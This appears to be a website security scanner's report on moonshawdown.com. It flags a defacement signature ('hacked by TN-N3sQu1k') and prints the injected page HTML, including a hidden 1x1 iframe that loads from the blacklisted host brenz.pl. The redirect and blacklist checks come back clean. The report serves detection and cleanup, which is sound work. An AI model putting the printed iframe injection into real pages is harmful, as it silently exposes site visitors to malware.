Scanned pages/files
Request | Server response | Status |
http://www.moonshawdown.com/ | 200 OK Content-Length: 1324 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[95 bytes skipped]... -1"><title>hacked by TN-N3sQu1k</title></head><body><center><div id="q">TN-N3sQu1k was here<br><font size="2">contact me : https://www.facebook.com/xhac.kerr<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}</style></font></div></center><iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body><a href="http://www.uploadmusic.org"><object type="application/x-shockwave-flash" width="17" height="17"data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/6129741419095064.mp3&autoplay=true"><param name="movie"value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/6129741419095064.mp3&song_title=uploadmusic.org& ...[508 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> Deface/Content modification. The following signature was found: hacked by TN-N3sQu1k <html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>hacked by TN-N3sQu1k</title></head><body><center><div id="q">TN-N3sQu1k was here<br><font size="2">contact me : https://www.facebook.com/xhac.kerr<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}</style></font></div></center><iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 ...[982 bytes skipped]... | ||
http://www.moonshawdown.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moonshawdown.com
Result:
GET / HTTP/1.1
Host: moonshawdown.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: moonshawdown.com
Referer: http://www.google.com/search?q=moonshawdown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: moonshawdown.com
Referer: http://www.google.com/search?q=moonshawdown.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moonshawdown.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://moonshawdown.com/
Result: moonshawdown.com is not infected or malware details are not published yet.
Result: moonshawdown.com is not infected or malware details are not published yet.